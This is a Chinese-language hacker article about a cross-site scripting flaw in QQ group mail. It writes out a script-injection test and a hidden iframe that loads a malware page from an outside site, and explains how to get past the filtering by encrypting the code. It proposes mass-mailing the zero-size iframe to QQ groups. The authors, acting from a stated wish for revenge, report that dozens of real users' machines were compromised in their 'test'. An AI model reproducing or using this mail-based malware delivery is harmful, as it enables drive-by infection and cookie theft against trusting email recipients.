| 一、起因
自上次L.S.T官方群出事以后,我当时还以为点了什么连接中了别人插的自动提交的表单。水落石出后汗呀,中的传说中的MS06014网马,太热心了反而遭人暗算了!群里的兄弟都说要报仇,于是后来就把注意力转到了QQ邮箱上,然后便就有了此文。
二、漏洞描述
QQ邮件分为普通个人邮件和群邮件,群邮件对脚本的属性过滤不严,导致使用群邮件服务的浏览器很容易通过跨站脚本执行任何恶意代码,包括cookies盗取和邮件挂马等,是个高危漏洞。为了照顾广大菜鸟,这里简单地解释下什么是跨站:跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。
三、测试过程
一开始测试的是普通个人邮箱,邮件内容为“test<script>alert('test')</script>”我们可以发现"<"和">"都被替换了,如图1。
无论代码如何转换也不能躲过邮箱的过滤,测试img跨站也不存在漏洞,就没有深究了。次日,雕兄在群里利用群邮件发公告习惯性地在结尾署名“<雕牌留>”的时候,他看了下源代码后发现“<”和“>”都没有过滤掉,代码竟然原封不动地显示出来了,看来有戏!换上跨站的JS代码再测试下。因为邮件的主题已经对跨站的字符作了过滤,所在我们在内容里面写“test<script>alert('test')</script>”,如图2。
发送,嘿嘿,发现成功跨出来了,如图3。
跨站最有用的地方无疑是挂马之类的了,光这样弹出个框框是起不了什么大作用的,所以我们得继续修改代码,换上大家所熟知的最常见的挂马代码:
“<iframe src="http://www.slenk.net";width="120";height="120";frameborder="0">”,不过发现这一次并没有成功跨出来,直接显示代码了。我们看一看源代码,发现空格又被过滤掉了。在关键字过滤之后我们发现属性之间分隔要用到空格!好,既然把空格堵死了(这样认为的人很多,呵呵)!将空格转换了是个很普遍的方法。似乎这样能避免拆分关键字了。但事实并非如此,如果我们把挂马的代码加密一下效果又会如何呢!
四、手到擒来
这里我们要用到的一个加密解密的网页工具,如图4。
把我们要加密的代码填到上面的空白处,再按一下“JS加密”,然后在下面的框里就会显示出已加密过的代码,如图5。
我们现在要做的就是把这段加密后的代码用群邮箱发送出去了,格式如图6。
发送之后,我们打开收到的群邮件,发现已经成功跨出来了,页面正确显示出了,如图7。
大家可以想像一下,如果我们把那个代码换成挂马代码,再把宽和高都设为0,那就不会显示出页面了,再加上一些比较有诱惑性的言辞,然后在所有QQ群里发邮件……由于是可信性较强的QQ群邮箱发出去的,毫无介心地打开的用户必然会相当多,到时候中招的人就会不少了。我和雕兄测试了一下,结果发现在短时间内就有几十台肉鸡上线了,如图8。
因为我们只是测试了一下,所以没有继续大量发送包含网马的邮件,只是为了说明一下此漏洞的危害性!此漏洞的测试过程已附带操作录像,有什么问题欢迎到http://www.slenk.net/论坛上讨论,或者X的论坛我也会常去看看的。
|
